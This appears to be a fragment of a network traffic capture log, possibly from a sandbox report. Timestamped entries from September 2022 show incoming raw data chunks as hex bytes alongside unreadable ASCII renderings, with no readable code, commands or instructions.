                                                                                                                                                2022-09-29 12:51:35 UTC12689INData Raw: bc 5b 5c 3a 45 0b 5c 7f ff da 9c 8d ba 27 01 70 3d 20 3f cf 76 d4 2b f5 f9 51 b8 7e f3 78 b0 35 5c 83 32 95 0d 51 19 e3 d3 7f d2 84 aa 35 9c de 07 23 0f 67 ff 37 e6 ad bb af 00 83 d5 52 66 4e e8 56 83 b6 c0 79 ea 1c 0f 7f 49 c4 89 6f 65 bf a9 61 4d 3c af 3a 0d 97 83 4c b0 6e 95 6c 8e 86 a7 3f 00 46 00 b8 c2 ce 04 af b5 8b 35 85 65 5d 48 84 a0 78 29 ce 91 ab 4c dd f6 39 37 4f ff 09 c9 7a 87 0c a8 a6 62 60 8a 6a 5a ba 2b 9a c2 5e 55 b4 03 a7 6b b0 57 67 74 ae 36 69 8c 9b c1 c8 f1 a3 62 ec ef e4 19 17 06 53 b8 a7 54 ce ec f9 38 9d 5f 81 08 e6 41 d0 b7 1e 93 4b ef e7 57 f3 3d 77 be 34 e9 bd e3 e9 df ff f9 d9 ba 58 12 4c 79 56 1b 3e 2a 84 8c 63 d2 ea 3e d8 ad 20 af 54 fe 4c e0 4b 06 09 5e 4e 4e 61 17 11 4b 49 11 5a 8c 85 b6 99 91 48 54 c5 03 c5 93 e0 d5 59 98
                                                                                                                                                Data Ascii: [\:E\'p= ?v+Q~x5\2Q5#g7RfNVyIoeaM<:Lnl?F5e]Hx)L97Ozb`jZ+^UkWgt6ibST8_AKW=w4XLyV>*c> TLK^NNaKIZHTY
                                                                                                                                                2022-09-29 12:51:35 UTC12705INData Raw: 2c 0a 29 4b 7d ed c6 28 73 7c b9 e1 02 ab 22 c1 ab 33 4f cd 87 f2 c6 93 85 08 d3 11 51 cf 3f 3d 31 21 16 bd dc 50 94 1f bf 0f 44 ee 27 bd a3 f4 41 cb f2 ee 04 a3 06 c9 80 36 e5 0e ee 6d e6 3f 91 d2 21 32 5b eb 72 b2 31 6a 20 68 70 60 df 6b cf 73 2f 45 2c 0a 26 e0 3b e9 5d 78 ac a3 bf e5 56 cc 2b 4f 66 b9 3d a1 27 11 d8 2e a5 3c 28 06 e5 ef 8f d1 a4 ce 63 42 06 85 fe 19 25 4f 17 df 50 87 eb dc ca b9 45 21 ca 4b d4 64 f8 f0 eb 3c 43 25 f1 c9 06 8e 65 c8 e7 e1 17 82 ff cf 7f d1 83 6d 20 3f 63 3b 74 a7 80 67 ca bf 14 74 ab c1 9a e1 b1 05 b2 6c 12 ca 74 9d 16 98 e2 d7 0e 59 93 aa 32 01 96 b8 a4 8c 09 ef 51 38 5a 2d c1 6a 45 d1 77 ef ab 42 d5 17 50 89 cc df c7 07 ab 40 89 fc 7d d4 e2 fc 02 55 c9 17 92 b4 0e bd ec 87 a1 ea 23 4c 4e 98 6a 76 6c 5f 44 01 f1 a2 13
                                                                                                                                                Data Ascii: ,)K}(s|"3OQ?=1!PD'A6m?!2[r1j hp`ks/E,&;]xV+Of='.<(cB%OPE!Kd<C%em ?c;tgtltY2Q8Z-jEwBP@}U#LNjvl_D
                                                                                                                                                2022-09-29 12:51:35 UTC12721INData Raw: 32 e5 a3 e1 5d c2 ea 9a cf 1a 8b 9c 0f b2 fb 94 8c 0b ee 52 64 84 70 6f e5 dc 40 68 19 17 f2 af 2a f0 25 92 32 c6 e1 38 7b 39 de fe 3e 0f c1 88 d0 ed f7 0d 96 53 68 b2 dd 6c 9e 65 0f 7b 93 fd 4e 2e eb 36 2c 40 ee 08 e1 11 5a 2c ee 20 cf 81 a5 b0 e4 83 b0 63 b3 07 ab 44 dd 78 7c ff b5 b4 b8 57 5b e0 06 88 9a 5e 64 cb c9 c0 ed 28 d6 9c 35 e1 7c 6b 67 fb 49 c5 23 c4 f3 e0 d7 30 65 c6 c8 14 b3 51 ee c0 ad 4c 45 2e 0a 1b 58 de cc d9 f3 1d c1 96 4e 30 c8 6e ee 13 61 a3 b9 d5 64 af 5d 0a 5a 59 28 76 dd 2f 98 6f b7 85 dc e5 c5 9b 39 d3 73 d6 d5 cd 66 27 a2 c1 24 39 e7 8d d1 5e 8f b4 c2 d6 e7 7e 24 be 0b 87 81 c1 bf 16 e1 5e 22 62 dc d0 85 9b 6e 00 3c 43 0b a9 3f 8d e6 91 3d d3 89 c6 ab 98 96 de fb ca 9c 15 0b 3a 8c c0 fb 66 0d 2a 63 35 33 8d 41 b8 ce c9 06 9d 26
                                                                                                                                                Data Ascii: 2]Rdpo@h*%28{9>Shle{N.6,@Z, cDx|W[^d(5|kgI#0eQLE.XN0nad]ZY(v/o9sf'$9^~$^"bn<C?=:f*c53A&
                                                                                                                                                2022-09-29 12:51:35 UTC12737INData Raw: 03 67 06 65 c6 ed 96 0a 3d fd 25 27 77 3d b7 fd 16 cb 01 fc dc ff 55 75 81 f8 e9 d5 13 de 32 aa 78 77 eb 9a 1c 04 79 c4 81 ff e0 2c 0a c4 44 4b ae cd df 8c 84 f9 fa 6b 96 27 b8 83 6f 31 a1 58 f7 dc b1 f3 0b 0c 83 e8 85 a9 a8 b8 39 bc c5 68 60 af 06 7d a7 b1 73 7c a3 d5 59 68 0c 43 e7 a5 e0 69 eb 62 c4 41 07 86 d2 c2 51 30 56 14 00 6f 37 9e 01 c9 62 a3 89 9b c1 b5 b2 32 03 61 48 a7 65 7c 63 b8 29 70 9a 27 b5 cb b6 1d 63 d8 41 e5 88 e0 e9 70 03 42 0c 33 e2 a2 ef 1e 03 4a 6f 0a 02 f7 eb 14 33 11 e9 ca 54 06 a0 a7 7a b6 91 ea 01 7d 98 3a cd a4 d5 0d a5 aa 21 36 62 bb 91 39 25 23 05 dc 7f 9d 73 75 0f 8d 14 92 1f 8f 4f 8d b2 c5 0e 7a 1f bd f7 90 1e a9 32 a4 ab 95 1b e5 5b 94 60 79 e1 68 a6 00 db 42 9b b5 a8 60 a0 3c 61 5f dc ce 4d 87 52 b9 59 79 bb 4d dc c4 36
                                                                                                                                                Data Ascii: ge=%'w=Uu2xwy,DKk'o1X9h`}s|YhCibAQ0Vo7b2aHe|c)p'cApB3Jo3Tz}:!6b9%#suOz2[`yhB`<a_MRYyM6
                                                                                                                                                2022-09-29 12:51:35 UTC12753INData Raw: 23 94 9d 16 16 93 c6 8f 49 ca 49 24 25 87 79 94 8b 97 b4 94 9e 4c 36 49 07 8b 74 19 15 c3 6b c1 ee 8d de 2e 19 cc db bf fc af ae b7 1d e7 c7 47 59 99 12 8f ff 12 45 d6 4c 13 77 4a 27 a8 0c 0f df c5 17 2d 8d 6b ec 8d 9c bb 60 17 a3 5d ef 8c 94 1a d7 45 2d 2a 52 a7 3e 78 0b 92 c1 02 e1 13 5b ec ac fa 75 ae 30 b5 d0 77 b9 35 15 b6 9b cb 75 d3 80 d1 a1 aa f8 e7 b6 53 2b 3b a5 04 3f ec 04 de 1d 78 56 36 91 b2 d8 bc 0e 0f 31 6d 38 9e 00 92 a6 ad 6d 21 fa 2e fe 92 93 96 60 31 29 f2 32 a4 17 58 e3 d8 ee 33 db c9 8f fe 11 09 03 2f c1 e8 1e 76 8c c9 93 e7 e0 24 f7 36 f5 93 bb 8d 98 c4 44 47 19 92 ea 71 2e 42 68 92 26 55 d8 44 4f 00 f6 d1 bd 64 45 f6 8b d3 74 b0 b4 de 8d b5 24 41 16 c3 13 9d 1f 22 0d 39 8c 9d 57 59 68 3a cc f7 db 5d 53 a1 ee 19 0a 7e 74 f1 d6 a7 48
                                                                                                                                                Data Ascii: #II$%yL6Itk.GYELwJ'-k`]E-*R>x[u0w5uS+;?xV61m8m!.`1)2X3/v$6DGq.Bh&UDOdEt$A"9WYh:]S~tH
                                                                                                                                                2022-09-29 12:51:35 UTC12769INData Raw: 88 84 4c 9f 40 6f 4b 95 0d 23 be 89 fd 7c e5 a9 bb 8e 1d 37 24 0b aa 3d 3e 9f 86 65 e4 d6 21 d8 51 9d 8c 70 be c3 77 51 f8 dd 60 c0 c0 37 c8 5d fe 1e 0c ee a0 0e 4a 71 cb 8d f1 b7 9c 66 7a 28 ef 57 f0 8d 35 bd 3b 57 44 de b7 c2 a7 f6 fc 85 9b b0 8c 1d 65 d3 ea e6 f1 94 c9 40 f2 f3 12 6d b0 71 72 a8 7f 2d 5f f6 80 87 dd ef ae e4 ec 07 d5 d6 ed 72 a2 3a c8 a9 8b 2e ce df 06 e4 20 ba aa 16 33 a3 e6 26 39 b7 be 8c a7 db 00 a6 68 86 66 0a 50 f4 f8 f4 a9 eb 00 8a c8 9a ff 8d a0 d1 01 61 b9 16 18 e3 54 d1 ad 8e 25 23 66 31 ea af e8 37 85 f2 78 5a d4 d9 8a 9c 2c 4c ff 79 bf dd a2 83 c6 90 e2 0e e9 7e 17 cd 34 66 84 ec 95 ea 5b 25 57 42 48 6c 44 4c c4 e3 b3 97 01 4c 98 0e 7a 95 d1 73 71 0c 1c 99 c8 dd 38 30 c6 21 8a 61 33 f8 1e a5 6b 8b e2 71 a9 3e ca 03 64 96 4b
                                                                                                                                                Data Ascii: L@oK#|7$=>e!QpwQ`7]Jqfz(W5;WDe@mqr-_r:. 3&9hfPaT%#f17xZ,Ly~4f[%WBHlDLLzsq80!a3kq>dK
                                                                                                                                                2022-09-29 12:51:35 UTC12780INData Raw: 07 81 cc a0 b2 46 6c e6 e8 01 20 ce a0 30 22 cf 72 77 b6 71 8a 78 62 a5 9f 77 94 a1 a2 c6 b0 93 35 3f f4 de b4 d0 cc 9f c5 83 c7 79 54 40 9a c5 47 d6 ec 65 81 2a f9 c4 1d 24 bf d2 8b 0c e8 6d 17 48 e7 1f 02 a1 63 bb 45 f0 c0 44 79 0b 52 7e be 55 72 7d ec 73 7b 34 50 c2 d1 b7 09 93 97 3b a9 78 96 fa c0 a3 64 e6 13 a0 44 c3 b2 d1 b0 41 ac f1 ac f3 c0 1e 10 df 5b 0a 8b dd 78 85 be 92 39 f9 6b e5 b3 e5 16 4d ae 5c b4 48 ae a9 c1 24 12 77 e9 28 05 02 50 d9 aa 93 43 9e 72 d0 f5 1c db a8 59 52 da e3 6e ad c4 32 c0 aa db 1c 14 eb 98 11 b0 84 40 53 dc 19 d6 d7 0d a0 f4 ad cc d0 78 d5 a0 ec a1 ee 43 2d 53 c5 b0 26 e0 1b 81 cb b6 b8 bc 79 1d fd 39 aa 54 2a 83 7b 11 b9 d7 1a 1a ae 60 96 9f c3 28 55 2b 84 22 c5 bc 19 3f a1 5b 5f 08 b0 a7 37 ca 74 ab 68 53 e9 78 14 a2
                                                                                                                                                Data Ascii: Fl 0"rwqxbw5?yT@Ge*$mHcEDyR~Ur}s{4P;xdDA[x9kM\H$w(PCrYRn2@SxC-S&y9T*{`(U+"?[_7thSx
                                                                                                                                                2022-09-29 12:51:35 UTC12796INData Raw: cd 7e 6f e4 e5 28 5a 5a c4 7e 1a 9c 3a 97 e4 35 f2 a7 e6 ed cb 55 a8 fa fd c0 7c 40 e9 c6 d5 f9 e4 fa 70 35 ee 4b 12 36 93 03 e3 ec 4f e4 00 d0 40 7b f4 c7 71 ad 50 19 c1 f1 7d 2b f4 6d df 3f 7a f0 aa 5c f4 6e 62 3b 73 67 24 50 89 c6 08 a3 b4 21 6a e9 37 a6 43 f1 26 71 33 c0 99 1c b4 9e e9 44 77 5c 1f cd 3d 47 f9 d0 91 03 08 54 03 0b e8 4f f4 7a 57 9a 53 d1 40 3f 2d c5 0a 8a 35 86 d5 52 a7 cb 8f 49 8b f1 fa d9 24 51 10 4b e5 a7 23 41 57 1c 49 e1 91 b6 2f 47 a7 7a 08 6a 3c fd 09 e7 05 ca 00 c8 f3 58 1c 27 b5 14 bf 8d ba 4a ca 20 7b 1b 4b ae 66 c6 21 a7 a1 85 55 4f c3 a2 19 e3 67 eb c2 39 ef 6a a4 57 a8 da 59 cf 9d 72 e0 4b 3d 48 63 42 dd 24 41 47 ca f3 c9 e3 ee 44 c1 03 83 84 4e ec 49 51 6a ff e5 21 bc 90 29 a4 e0 86 47 c6 fe 77 39 67 2c ee 32 38 84 a6 1e
                                                                                                                                                Data Ascii: ~o(ZZ~:5U|@p5K6O@{qP}+m?z\nb;sg$P!j7C&q3Dw\=GTOzWS@?-5RI$QK#AWI/Gzj<X'J {Kf!UOg9jWYrK=HcB$AGDNIQj!)Gw9g,28
                                                                                                                                                2022-09-29 12:51:35 UTC12812INData Raw: 7c 12 64 26 28 64 b5 d7 be 53 7c bd 10 56 48 74 a0 a6 09 47 ea 8d 4c 8b cc 8a 4d aa 6c b7 f2 03 aa 0a ac 22 92 d7 63 1f 10 2e c8 11 de 90 bd f4 a5 a8 64 0a ee d0 39 e7 49 de a9 9a 86 7d bb a0 5d 1f c0 19 8b 28 b7 2f f2 7b e3 7d 57 3a 4c 65 fe 21 d3 c1 8d f0 49 a5 26 d3 7c 4b 1c fc d9 8b ea 40 30 26 57 ee c5 f7 12 b5 63 cb 77 a0 2b c6 6f b6 5f 5a 8e 07 1c 11 94 de 2e 1e 76 aa d3 6d 71 82 63 db d9 e5 b9 b1 0d 79 61 0c 2a b3 17 a4 32 51 aa bc d5 3f f0 d2 42 16 b5 82 68 7f dd 28 ba 29 d2 39 29 f7 36 64 47 bb 38 10 61 a7 c6 2f ab 3c 2e 04 9b 25 03 28 e2 4a fe cf 50 71 47 0d d4 06 2a 8b c6 92 ba b2 ea 6e a5 b5 82 3b 0b 3c ad 90 38 94 57 2e e8 d2 87 47 fd 22 5d c4 98 ba 80 6e 7c 9c 22 27 5b b3 fa a5 49 03 d7 4a 57 c8 bd 91 49 ae 6c b5 cf 58 67 1c 59 bd 0e 32 19
                                                                                                                                                Data Ascii: |d&(dS|VHtGLMl"c.d9I}](/{}W:Le!I&|K@0&Wcw+o_Z.vmqcya*2Q?Bh()9)6dG8a/<.%(JPqG*n;<8W.G"]n|"'[IJWIlXgY2
                                                                                                                                                2022-09-29 12:51:35 UTC12828INData Raw: d3 37 92 e6 b7 62 8a fa d3 f0 aa 00 68 aa 9a 56 b3 e5 15 6d 72 d8 b9 f1 29 be 53 85 8a f6 04 59 7f 4f 91 16 1b c4 fd b0 16 69 fe da b5 7e 52 a1 81 b2 a4 c6 a3 62 1a ab 78 9f 77 a9 3e 7a d1 ef 42 41 7d 1c c8 31 88 21 9e 18 3e d3 65 f8 fd 7a fb 73 02 f8 16 c1 66 10 a4 91 98 3f 66 ee a2 2a cc 4d 84 a9 d3 16 2d 89 79 02 03 49 71 2b b7 ff 95 90 9f e2 65 39 33 f2 28 8a b5 a5 15 67 54 aa d6 8d 85 74 2f e9 43 b1 7c 52 9e e2 e7 f3 f1 f5 81 50 f7 c0 c9 07 de c7 4e 17 67 1c 4d 02 8f af 9f 68 23 df 43 be fa 17 6b bb be 72 73 68 64 ed aa 70 f2 17 82 e9 9f 0e e9 b9 f9 69 7c 57 fd 29 01 85 7b 67 c6 3e 5d a6 05 35 91 5a 6a 2f 1d 97 5f 04 b2 b1 d7 d4 1a 01 64 c9 4f 88 d3 c9 e7 a1 9d 1f 0d 8c 3c f6 d6 cf bc fd d2 bd 24 5e 98 75 31 09 95 01 f1 73 f2 e8 d8 06 d9 d5 a0 b6 0b
                                                                                                                                                Data Ascii: 7bhVmr)SYOi~Rbxw>zBA}1!>ezsf?f*M-yIq+e93(gTt/C|RPNgMh#Ckrshdpi|W){g>]5Zj/_dO<$^u1s
                                                                                                                                                2022-09-29 12:51:35 UTC12844INData Raw: d5 f6 bf d9 81 ee 2f bb 5b 9c 25 d9 f5 23 69 f1 c5 33 bc 6b a1 85 6c a9 67 48 41 c0 30 27 b8 cb 9c f5 49 20 2a ae 37 56 d7 d4 73 e6 d4 23 1d aa ac 64 8c 34 a6 36 1b 54 b5 da ad 40 d0 da 18 bd 14 51 0c 58 1e e5 34 fd 1f f7 c1 77 84 21 05 3c 1f d7 fe a0 92 d8 59 d4 17 8d fa ce 90 ab ce 68 0f b0 f0 16 c7 45 f5 7d 69 ba 7e 8f 54 19 46 2d d9 46 9e 99 dc 34 3c dd 98 9c 18 44 52 91 53 d9 5b 26 d9 7c 2e 7b f3 21 f3 07 18 40 75 06 fc af f8 77 89 e6 c2 b5 09 b6 ac 46 32 9c 30 3a 8b 56 de eb 6b 30 82 c5 12 e5 71 31 1e 3b 40 c5 77 0f 68 27 aa be 73 2b c6 65 3e 1b a6 9e 65 15 f9 b8 9b 18 bd 9f b3 fd 90 b4 ac ba d4 cb 59 05 3f bc f4 85 18 19 05 d7 2d d1 c8 d9 4a 50 fe 47 b8 c2 b4 47 a7 d7 83 97 d0 9d 4a 4d 68 a1 fb fb b1 09 64 20 26 fa a5 6d 74 f7 ef 1d 1d c6 14 5f 18
                                                                                                                                                Data Ascii: /[%#i3klgHA0'I *7Vs#d46T@QX4w!<YhE}i~TF-F4<DRS[&|.{!@uwF20:Vk0q1;@wh's+e>eY?-JPGGJMhd &mt_
                                                                                                                                                2022-09-29 12:51:35 UTC12860INData Raw: 73 c7 45 4b e5 44 aa 1f a2 5b ff c3 4d e3 fa eb 32 3f bf 76 31 c1 5b 15 79 2e ea b1 89 7f 15 03 a9 60 e7 81 15 8c cd 36 39 8d f3 17 91 d3 0e 0a 53 c2 5e 73 c1 10 8d 3f 2f 81 76 53 e5 f1 c0 1f d6 c3 2e 67 e1 19 03 63 5d b2 f8 23 22 55 f7 d3 7a ac 18 19 f5 5c b9 2c 2a 3d 09 d1 a9 72 09 a6 e7 4a ae 89 bd 08 41 b2 b5 81 44 03 0c 98 0e 6f 49 96 ce ce 0c b4 b6 de 50 72 8d b9 5c 3b 0d df 7d df 6c cd 39 43 f3 5b a5 8b e2 8e 30 6c 10 1e 0a b0 80 18 2b e0 a8 56 fa 96 cc 5d 31 14 5b 49 1e 06 37 47 d3 bd 71 03 f5 49 e1 62 a2 3e e2 7d 9e 23 fd 2f bd 4f 2c b2 7a 45 dd f6 cb 02 57 ca 4a 16 73 46 46 0b ba 54 dd c1 08 e2 d6 e3 b3 aa 4b 35 a7 8d bb dd b9 0d b3 a5 95 d2 d4 1f 54 85 bf 8d 19 bc 0f 32 40 55 3a 4b 3d 93 13 3e 05 b3 7d c5 64 22 14 76 d4 3d 1e 6c b6 d8 f9 99 55
                                                                                                                                                Data Ascii: sEKD[M2?v1[y.`69S^s?/vS.gc]#"Uz\,*=rJADoIPr\;}l9C[0l+V]1[I7GqIb>}#/O,zEWJsFFTK5T2@U:K=>}d"v=lU
                                                                                                                                                2022-09-29 12:51:35 UTC12876INData Raw: 57 3f 79 40 ca 5d 72 ed ec 24 4b bc ee 51 32 61 57 a8 bf 57 3d f0 b5 16 b1 70 e3 7c 40 1e 9d b5 af 92 9a 09 51 a5 e5 8f 75 89 0f db 1d 1b b1 59 f3 b5 f7 aa de f8 dc f6 c4 60 f9 e8 19 26 61 5c 4c 7a af 7a f4 db 1e 94 ba 62 31 6b 80 6f e3 f3 f7 08 b5 c9 9e 5a c0 52 bd dc df c2 eb 84 34 cb 18 0b 23 ad 04 8c 4c 48 fa a6 6b 60 67 aa 49 fd 46 6e 3d 98 c6 e6 d1 1f d7 32 f3 51 2e 80 6f b4 5d 98 6e 0e 38 9f 94 98 bb 17 60 1f 62 c3 ed 64 cd bf 0f 8e 78 33 2a 54 4e e6 c0 c3 9a af 31 0d ed b7 8a 76 d0 ec ae 67 8b 55 22 1f 98 40 0d a7 c8 6b c4 cf b5 3b 97 dc d2 c0 68 2f 6b 42 66 9b 46 31 c0 f5 a4 7e 00 f7 e1 48 27 37 99 86 c4 06 cd 36 c1 49 98 8f 59 5b 24 7c c4 50 8a 27 3c 8b b7 a1 9f ef 3a 11 5c 4c 28 68 24 84 ee fd 55 69 9d 18 7e 05 17 88 2e 5c a8 32 5f eb c2 1b 84
                                                                                                                                                Data Ascii: W?y@]r$KQ2aWW=p|@QuY`&a\Lzzb1koZR4#LHk`gIFn=2Q.o]n8`bdx3*TN1vgU"@k;h/kBfF1~H'76IY[$|P'<:\L(h$Ui~.\2_
                                                                                                                                                2022-09-29 12:51:35 UTC12892INData Raw: 42 ce a8 ff bb 23 73 3c f8 cd 1a 74 45 08 c8 c4 72 94 fb 20 ba 28 b0 ee d7 f8 cf 91 d2 e5 62 f1 dd 25 00 fe 3b 33 50 44 5a a1 88 f5 0c e2 ce 35 e7 d9 0b a3 3b 63 ea 4c f2 a3 1f ca 19 21 4b fb 26 19 9b c0 7c 4e 97 ae ef 9f c3 4b 1f 96 ad c9 c9 3c 8b 95 24 38 a8 c4 e2 56 8f 3f 6b 88 7b 3d d8 3b 93 ba ff 47 ab c3 d9 cc 93 aa a4 32 4b 7f 70 8a 7e 17 fd c1 ed bf b5 2c f0 32 ee 97 86 c0 65 01 be 34 b6 d5 f0 50 2a 8c 15 76 6a 31 09 12 ef 61 ea 14 56 75 b7 5f fa 31 ae 64 60 9d a1 3e a0 8f f7 9c 5e 13 e7 3f 73 01 9b a5 46 25 09 5c 0c 6b a8 ad 4e f2 6c d3 a7 e6 bb 85 64 8f 75 93 19 9d 4f dd c4 0c d3 04 7c 27 6d 45 b0 eb 59 96 91 f6 ec b6 22 98 87 0e 22 61 d5 9e 17 ad 5e 2a 29 1a 95 43 6f be e0 2c ed 97 9e bc 7d ca fb aa cd bf b9 8d 35 4c 8c 4b 64 4e fd 00 6f 4c 0a
                                                                                                                                                Data Ascii: B#s<tEr (b%;3PDZ5;cL!K&|NK<$8V?k{=;G2Kp~,2e4P*vj1aVu_1d`>^?sF%\kNlduO|'mEY""a^*)Co,}5LKdNoL
                                                                                                                                                2022-09-29 12:51:35 UTC12908INData Raw: 71 1c 6c cb 41 11 db 1a e6 99 2c b0 ed 93 90 3a 99 c5 ca ef 71 23 18 3d b7 ed 5a b7 a5 6d ca e9 0a fe a1 95 5a 11 32 16 d3 c4 d3 62 9a b0 df 80 b8 70 ed eb 7b 9e a3 61 f0 5d b1 04 f8 f8 f8 0e 03 24 d7 4f 03 22 65 09 fd 9f f0 ce 22 01 dd 89 a9 d1 ca 14 7c 2b fd 57 f9 88 55 b3 5f b5 79 d6 f3 cb 3a 50 36 ca 3a 0d 69 b4 08 89 32 35 17 34 8b b4 3a 07 f0 21 c4 b6 2f 02 d8 4a 09 c8 07 62 c5 53 92 17 16 9b d5 ef a9 59 50 b9 eb 50 f9 11 fe d2 52 d1 24 d8 ef 7d c7 ed 2b 0d 5f 35 a0 0a 68 c1 c1 35 ef 59 ea 5e bf 9e 1b a5 b9 a6 7a de 72 55 6e c4 ee b7 aa 48 fc f0 71 7c 2a 40 ef 0e b7 06 e3 08 ee b9 81 72 41 b4 5b a8 7d 8a 76 16 f9 93 ed 18 f1 ed 21 a3 24 a9 fd fc 44 ff ab 3f b5 b6 71 4c e2 08 34 00 bf b0 f7 ad 91 5b 53 4c 54 79 a2 55 dc da 99 4a 23 40 bd 29 85 42 26
                                                                                                                                                Data Ascii: qlA,:q#=ZmZ2bp{a]$O"e"|+WU_y:P6:i254:!/JbSYPPR$}+_5h5Y^zrUnHq|*@rA[}v!$D?qL4[SLTyUJ#@)B&
                                                                                                                                                2022-09-29 12:51:35 UTC12924INData Raw: 54 5c 4b 45 14 d6 20 28 86 6f 09 3e 15 f6 3e 86 d7 79 7d 05 0f a2 71 24 12 de e5 3b c6 54 a8 fe c4 6b 36 e6 2f 7e b0 5d 4f f8 7f b2 3a 87 e7 42 4e 37 74 e0 d9 3f 4a 04 e6 de 6d 7c a0 64 e6 e7 62 80 e6 86 1f 03 1d 06 c7 96 92 a4 7c fd 1f ad f7 4b db 12 52 37 aa d1 f9 56 d6 81 7d 49 dc 58 57 da 08 a0 b5 c5 71 65 2e e6 0d 2f fb c6 7a 8b b3 3a 92 d0 5e 99 1d cc ea 8a 3b 51 4c 48 13 a9 e1 34 be a8 2e a8 d6 bf 59 31 f4 ad e1 28 ec 2d 44 24 21 64 25 95 cc 82 a9 05 f4 dc eb cb b8 8e ce fd 21 54 03 75 d9 96 f6 85 64 ca d6 29 d5 da b2 61 90 68 a2 30 41 a8 83 81 19 df 84 91 5d 6a 98 37 ba 12 a1 ac 65 2f 9a 1d 28 41 66 c6 8c b6 2d 38 9b d7 16 d7 37 e6 34 fe 3e 7c 21 15 b5 ee 37 8a 7c 7b eb 63 83 c3 6b a8 73 97 68 2a e6 14 43 3c fe 58 1d 23 2f 9c a1 bd c0 ce ad 8e 75
                                                                                                                                                Data Ascii: T\KE (o>>y}q$;Tk6/~]O:BN7t?Jm|db|KR7V}IXWqe./z:^;QLH4.Y1(-D$!d%!Tud)ah0A]j7e/(Af-874>|!7|{cksh*C<X#/u
                                                                                                                                                2022-09-29 12:51:35 UTC12940INData Raw: 2a 86 4a 28 7e 64 d6 10 62 1d 85 dd ec d8 8e 36 3a 41 c9 75 7b 5e 37 67 8b 38 d0 f2 50 1b ed ee f0 66 b7 70 a7 9d f7 bd a4 c6 12 87 e6 7f f1 f9 5c 56 dd 68 5b 9f 22 d3 eb 26 ca 3a e4 83 5a 42 77 54 fa c8 0b 57 ca 48 4e a1 e1 12 88 a2 90 b1 d7 06 66 2f 4b c9 71 ca 75 17 76 e3 03 91 8a 93 f0 71 eb 39 39 bf ec e5 db 6a 39 f3 46 33 1e a2 15 86 e0 85 32 ea 7e ec c7 99 3b 84 71 7b 5d 36 7e c5 97 dd 69 fb 12 59 0c e8 1b 8f e1 e7 99 e1 15 22 dd a9 8b e0 12 54 6a 25 e7 c6 69 3e a2 8b 42 65 ee 4d 8d d3 95 5c 2f 5e 1a 85 11 f6 3c d2 9b 30 30 5d ce bb ef 36 69 33 d1 2c 0b 4e 08 1c f7 92 cd 01 90 0d 1f 3a 37 1f 53 c2 7c 55 cb fe 99 10 0c 40 54 7e 4b 03 a8 75 b9 c0 36 8d e7 b1 6e b8 b6 91 8c 2f be 30 97 db 7d d1 55 a4 65 65 1a b4 6d 73 2b b2 de 3b 10 d0 98 cd ff c1 e0
                                                                                                                                                Data Ascii: *J(~db6:Au{^7g8Pfp\Vh["&:ZBwTWHNf/Kquvq99j9F32~;q{]6~iY"Tj%i>BeM\/^<00]6i3,N:7S|U@T~Ku6n/0}Ueems+;
                                                                                                                                                2022-09-29 12:51:35 UTC12956INData Raw: ff a9 fb 26 f9 a1 05 e4 0a 12 9b 70 fb 26 f5 22 e7 da 2e d7 7f 66 36 6a 03 58 0a 44 b1 a6 5a af c2 5c 4f c9 f7 24 a2 ae c7 e4 15 d1 2d 23 0b a3 90 8f d5 db 30 e5 33 3e 35 7d 6d 8f a8 c1 12 4e 9b ad a9 e1 0d 6f 4e 7f 70 5c c9 43 f2 3d 43 07 e0 e9 48 52 97 3a cf c5 3f c4 bc d5 f4 a4 f3 e6 8c a2 e0 11 59 af b0 bf 66 08 96 e0 97 ce 7d 54 86 6f 75 4a 45 b3 4f ed db 70 f8 7e 8e 5f 9b 2f a8 c7 9b 98 43 a9 5b d7 5e c3 04 f6 8f 82 44 68 fa f3 bd 45 b7 94 29 43 d3 f3 a3 e9 19 18 1f 7f 2c dd 27 69 ef 7e 4a 1d ce 5c 5e 80 0b d3 31 b2 d2 aa 93 51 24 fa af 41 a0 82 69 48 64 14 ac 7c 4b 41 8f a1 08 c9 b4 f8 78 ee eb a0 d8 0f a2 14 72 55 5c 6c 62 3e d4 3a fd 9e 3f 33 9b b4 fc ef e1 d5 78 c9 a4 41 41 71 5e f5 fc d1 1a fc d6 5e 17 38 1b a3 b7 22 03 c8 c7 b5 db 56 c4 ee ca
                                                                                                                                                Data Ascii: &p&".f6jXDZ\O$-#03>5}mNoNp\C=CHR:?Yf}TouJEOp~_/C[^DhE)C,'i~J\^1Q$AiHd|KAxrU\lb>:?3xAAq^^8"V
                                                                                                                                                2022-09-29 12:51:35 UTC12972INData Raw: d9 9d 45 b6 2b 90 7f 0b 4e 09 95 6f 4e 05 3a fa 96 4b 94 ab f7 75 ac a4 ec ca b6 cf 0d 97 0e bd ab 96 56 53 d3 be 27 aa 48 12 62 68 ad ac 6f 10 96 a7 5d 53 ae 19 2a 4f 2c 63 eb 8a 52 0b 7b 9a 6d a4 b7 f2 a6 c2 31 4b 6b bd 72 ce f1 3b 29 20 cc b2 18 0c 0f d3 37 99 50 48 4d 4b f9 94 85 0b 08 81 d3 c5 b9 cb 06 51 44 fe a5 43 e6 7f a5 e1 76 93 25 17 c7 67 5f 20 ad b2 68 27 d1 f1 90 0d 64 85 37 0f 42 62 ed 6e 22 69 22 75 fe 20 7d 8c 26 ce 7a 23 80 c4 f7 33 81 eb 58 23 f1 e1 84 b5 84 e1 1f 4a ff 72 97 ef b3 37 32 b5 0d 58 03 ec db 71 97 68 1a ea b5 b2 81 1e 2a 4c 9b b4 e3 20 00 d1 23 30 95 5f 4d 2f 3b 1e 02 e3 8f 25 cf aa 49 e3 ba 6e 51 a3 2a 8e be 92 58 b9 cf e0 71 8c ae dc 7f b7 91 22 e8 21 c0 86 30 a5 ed 5d 73 fa 47 04 2e 32 b9 df 36 89 49 bd af 12 39 6c 02
                                                                                                                                                Data Ascii: E+NoN:KuVS'Hbho]S*O,cR{m1Kkr;) 7PHMKQDCv%g_ h'd7Bbn"i"u }&z#3X#Jr72Xqh*L #0_M/;%InQ*Xq"!0]sG.26I9l
